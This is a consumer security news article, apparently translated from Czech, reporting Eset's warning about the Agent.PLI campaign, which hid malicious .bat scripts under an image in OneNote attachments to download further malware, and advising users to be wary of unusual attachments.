Malicious codes are most often spread as attachments to spam emails. More observant users can often tell at first glance that it is a malware, because the attached file has an executable ending of .exe or .bat, so it is a program for Windows.
Security experts warn users to never run such programs unless they are sure of their origin, content and functionality.
This is how they rob the faithful! Banks are sounding the alarm about new tricks of cyber crooks
Safety
In the case of the malicious Agent.PLI virus, however, it is different, it has a completely different extension. Thus, users do not even have to recognize that it is malicious code at first glance. “Here we see a new trend in attack campaigns – sending OneNote note documents that contain malicious scripts,” warned Martin Jirkal, head of the analytical team at Eset’s Prague branch.
“Agent.PLI appeared most often as a shared document named Invoice 575367.bat. Attackers try this method probably because of the tightening rules for sending e-mail attachments, and they are looking for ways to bypass this restriction,” stated Jirkal.
A very simple attack
Overall, the attack was very simple. “A note document with a .one extension embedded several malicious .bat scripts that were overlaid with an image. The image prompted the user to click and open the document. By clicking on this image, one of the malicious scripts was launched, which started downloading additional malware to the device, most often from the Qbot, IceId, AgentTesla or RedLine families,” the security expert described the course of the attack.
According to him, it is evident that this year cybercriminals will be very interested in reassessing current strategies and investing in new types of attacks. “Although attacks using OneNote are currently on the wane and thus appear not to have been successful, the principle behind this strategy can certainly resurface,” Jirkal noted.
From the lines above, it is clear that users should be wary of different types of files when it comes to spam emails. Malicious codes can be hidden in attachments other than those with the endings .exe or .bat.
Last year, cybercriminals earned nearly CZK 130 billion from cryptocurrency scams
Safety